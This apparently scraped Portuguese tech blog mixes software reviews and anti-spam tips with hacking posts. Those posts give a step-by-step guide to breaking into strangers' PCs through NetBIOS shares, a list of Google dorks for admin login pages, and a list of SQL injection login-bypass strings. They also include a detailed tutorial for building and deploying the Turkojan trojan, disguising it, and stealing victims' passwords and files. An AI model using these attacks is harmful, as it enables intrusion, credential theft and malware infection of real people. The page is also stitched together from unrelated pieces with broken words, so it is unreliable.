Você pode criar listas de procedimentos bons – que devem ser adotados pelo programa – e outros para serem evitados pelo seu computador e o software para o bom funcionamento de ambos. Existem opções situadas na região denominada “Automation” (Automação) feitas para tornar algumas preferências automáticas, como a programação do tempo para Liberação de memória e a própria criação dessas tais listas.

Também há controles para a definição do tempo entre cada verificação de sobrecarga da memória. Arraste o ponteiro para escolher qual será o intervalo de tempo entre uma verificação e outra. Os outro mostradores abaixo de

ste servem para definir os níveis de compressão de memória (utilizado apenas em casos extremos) a partir de um determinado número de consumo dos programas.

Proteção e mecanismos de segurança

O Memory Improve Master possui, também, uma medida de segurança bastante importante. A opção “CPU Protection” é essencial para que a memória não seja comprimida caso a Utilização da CPU esteja acima de um determinado valor (%). É

recomendável manter as configurações padrão do programa, assim evitam-se riscos; caso você não tenha conhecimentos a mais sobre este assunto.

Quando você não estiver operando a janela do Memory Improve Master, ela será minimizada e estará disponível em um ícone na Barra de Tarefas do Windows, ao lado do relógio. Este ícone funciona como um gráfico que exibe a constância do uso de memória e também balões de diálogo para que você tenha controle da quantidade (%) de memória que está sendo usada ou que está livre.

Ao clicar no botão com uma engrenagem, você acessa as configurações do Memory Improve Master. Nesta janela é possível ordenar que o programa inicie junto com o Windows, aceitar ou não a exibição de ícones e mensagens a partir da Barra de Tarefas, usar teclas de atalho para acessar o programa rapidamente e outras informações importantes para o bom funcionamento da máquina. Fica a seu critério es colher quais delas são aequadas ao seu nivel de uso.



Nenhum virús detectado!

Saiba como se proteger dos Spam


Categoria Anti-Spam

Anda desanimado com sua caixa de emails? Está sendo sufocado por spams e emails indesejados todos os dias? Pode ficar tranqüilo, porque este definitivamente não é um problema exclusivo de seu email. De acordo com o relatório anual da empresa Barracuda Network, líder mundial em email e segurança na web, divulgado ontem, de 90 a 95% dos emails enviados no ano de 2007 foram spams.

Se você estava desanimado, esta notícia foi a gota d’água que derrubou suas esperanças em se livrar dos tão “mal ditos” spams. Mas não precisa se desesperar, existem algumas dicas para bloquear spams e ficar livre de todo esse lixo eletrônico. Clique em Leia Mais (Read More) e aprenda!

1) Antes de tudo, se você não quer ser um alvo dos spams, é preciso seguir um mandamento: não criar cadastros em qualquer endereço da internet. Colocar seu email na web é o primeiro passo para transformar seu email em uma lata de lixo. Isso nos leva à segunda dica…

2) Como criar cadastros em alguns site é necessário de vez em quando, é interessante criar uma conta de email alternativa, que poderá ser usada sem preocupação para fazer cadastros em qualquer site. Com certeza esta segunda conta será bombardeada de spams, mas isso faz parte do plano.

3) Uma estratégia que também funciona é usar clientes de qualidade. Alguns serviços de email como o Windows Live Mail Desktop, Mozilla Thunderbird e Pegasus Mail são boas dicas.

4) Se você não quiser criar uma conta alternativa, aqui vai uma boa dica. Alguns sites estão oferencendo um serviço online para criar emails temporários. Estes emails estarão disponíveis por um curto período de tempo, suficiente para você utilizá-lo em cadastros. Alguns destes serviços são: Mailinator , myTrashMail e SpamBox.

Agora o blog foi cadastrado no BlogBlogs Brasil Vlww!

BlogBlogs.Com.Br
Invasao por IP

1º-
Certifique-se de que você possui este programa: nbtstat.( ainda não disponivel neste site)

2º- Vá ao Prompt do MS-DOS.

3º- Digite: nbtstat -a o IP do cara que você quer invadir

4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)

5º-
Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.

6º-
Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu digitei)

7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.

8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"

9º- Pronto! Você invadiu por IP!

10º- Conselho : Nunca apague nem modifique NADA somente fuce bastante nas coisas do lammaH e se achar algo interessante pega para você.

OBS: Tem algumas pessoas que renomeiam o arquivo vnbt.386 no windows\sytem para que se alguem tente te nukar ou invadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da para invadir



VejaBlog - Seleção dos Melhores Blogs/Sites do Brasil



Depois de um mês de trabalho bem sucedido finalmente nosso blog foi para a seleção do vejablog.com.br dos melhores blogs do Brasil!
Com 7.8659 acessos em uma semana, com 6.982 clicks em uma semana concerteza iremos despertar a atenção dos anunciantes e ganharmos coisas mais importantes! E aguardem que eu irei concorrer no prémio ibest 2009!

Hackando sites com as strings:

Ai está, um jeito bem facil de invadir, basta inserir as strings no google e pesquisar:


allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp

Para obter acesso root digite no campo de login e senha:

b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
"Transforme a aparência do seu XP em Windows Seven, sem perda de tempo ou complicações!"

Dê cara nova ao seu XP com Seven Remix XP, um tema de simples instalação que em apenas alguns segundos transformará a aparência do seu sistema, deixando-o praticamente idêntico ao tão comentado Windows Seven, imitando os efeitos e estilos de janelas e barras de tarefas, mas sem pesar na memória!

Importante

Ao instalar Seven Remix XP em seu Windows XP, preste atenção para deixar a caixa “Create System Restore Point” marcada (conforme mostrado abaixo). Desta forma você permite que o aplicativo crie um ponto de restauração no seu sistema.

Em casos de quaisquer falhas no seu sistema durante a instalação, basta restaurá-lo de modo prático e seguro. Ainda pela tela de instalação, é possível selecionar se você deseja os complementos adicionais.

Espetáculo visual

Depois de instalar o pacote, é hora de reiniciar seu sistema para conferir o seu novo Windows! Você se deparará com uma tela praticamente idêntica à do Windows Seven (7), inclusive com o famoso papel de parede do peixe vermelho.



O Menu Iniciar (desde que não seja selecionada a exibição clássica) também é alterado, contando com ícones maiores, divisões avançadas e dégradés suaves. Novas aparências são conferidas também aos botões de Logoff e de Desligar a máquina.

O pacote completo

Não está satisfeito com as transformações na sua área de trabalho e quer dar um toque ainda mais pessoal para o seu computador? Sem problemas. Se você deixou a caixa “Extras” marcada durante a instalação, clique com o botão direito do mouse sobre o papel de parede e selecione a opção “Propriedades”.

Aqui você encontrará outros papéis de parede do novo Windows (marcados com nomes do tipo “PDC Remix”), proteção de tela personalizada com a nova logomarca e também novos estilos e cores para a barra de ferramentas. Dourado, azul escuro e modificações especiais são apenas algumas das apetitosas escolhas possíveis.


Testado sem nenhum virús!
TUTORIAL TURKOJAN

Aqui neste tutorial vou explicar passo a passo e muito bem detalhado como criar um
servidor e como funcionam as funções deste legítimo trojan turco, especificando as
versões 2.0 e 3.0. você pode baixar o programa no link abaixo:

site oficial: www.turkojan.com


primeiramente o que interessa é a criação de um servidor, já que todas as funções
seriam desnecessárias sem um servidor. vou exemplificar conforme a versão 3.0, já
que são praticamente iguais as versões 3.0 e 2.0.

video aula

1°) criando um servidor turkojan:



> clique em “editor” e nessa tela que se abrir você deverá proceder da seguinte
maneira:

> clique em “ icon” para ar o ícone do server, ou se preferir deixe o default
mesmo.

> no campo “victim name” você deverá especificar um nome para a vítima(s) que se
infectarem com este servidor, como exemplo = vítima.

> no campo dns-ip coloque o seu endereço ip, esta é uma parte interessante do
programa, já que funciona com conexão reversa, pois ao invés do ip da vítima, faça um cadastro no site www.no-ip.com e baixe o programa no-ip, nesse campo seu ip vai ser parecido com esse "seunome.no-ip.com" esse vai ser seu ip.

> em “port number” você colocará a porta em que o servidor se conectará, de
preferência deixe a porta default mesmo.

> em “connection password” defina uma senha para posteriormente se conectar ao
servidor, podendo deixar a default também, normalmente sendo =”cigicigi”.

> no campo “bind server with a file”, se preferir disfarçar o servidor com algum arquivo, se preferir disfarçar o servidor com algum arquivo poderá fazer marcando a opção correspondente.

> no campo “fake error message” você pode colocar uma mensagem de erro falsa
como alerta após a ução do servidor, editando-a ou, sem mensagem mesmo.

> no campo “registry settings” você pode definir o nome do serviço que aparecerá em um gerenciador de processos, após a infecção do pc.

> marque a opção “pack server...” caso esteja desmarcada.

> clique em “save” e escolha o diretório para a criação do servidor e pronto.

2°) conectando-se ao servidor:



> depois que você mandar de alguma forma o servidor pra determinada pessoa e ela o utar, confira se a senha que você configurou para o servidor corresponde à que aparece no campo “pass” da interface do programa (recomendo usar a mesma senha sempre pra evitar esquecimentos) e clique no botão “active”,

> aparecerá uma pequena janelinha no canto direito inferior da tela com uma mensagem: “vítima is online now” que significa que a vítima está online e você poderá se conectar.

> na parte inferior da interface do programa você terá a lista de suas vítimas
conectadas no momento, para se conectar a uma delas, clique no ip correspondente
(normalmente mais que dois cliques para dar certo).

> verifique se a mensagem na barra de títulos identifica que você realmente se
conectou, se sim, ok.

3°) função passwords:



> a primeira opção de interação com o pc da vítima será a “passwords”, onde a “local
passwords” não sei pra que que serve (indica passwords da própria máquina).

> em “remote passwords” você obterá os passwords do pc onde o servidor
conectado está alojado, dentre outras, podendo achar as senhas do pc, do ftp,
outlook, etc... e poderá salvar estas senha em um arquivo de texto.

4°) função comunication:



> em “chat with server” você pode interagir através de textos recebidos
instantaneamente pela vítima, onde se abrirá uma pequena janela em seu pc,
podendo lhe enviar mensagens também.

> em “chat properties” apenas especifique como você irá querer que apareça o seu
nome como o da vítima nacaixa de diálogos.

> em “other properties” defina o tamanha em percentual da tela do chat.

> agora basta clicar em “start chatting with victim” para iniciar a conversa.

> em “send message” você tem a opção de enviar uma mensagem para o computador da vítima, podendo escolher um ícone para isso e podendo testar antes de enviar clicando em “test message” e enviar clicando no botão “send message”

5°) função file options



> em “file manager” você tem acesso aos arquivos do explorer do pc da vítima,
podendo acessar os objetos de inicialização, painel de controle, pasta windows, e
demais pastas de forma clara e objetiva.

>na parte inferior da tela que se abre, você terá os botões com determinadas funções específicas, como fazer download ou upload de algum arquivo, criar uma nova pasta, deletar uma pasta, utar determinado arquivo, entre outros.

> em “find file” você poderá fazer uma pesquisa no pc da vítima, especificando a
unidade e o formato do arquivo a ser encontrado, por exemplo = *.exe; *.ini; *.bat.
para isso basta clicar no botão “find file”.
Perolas da H.O !!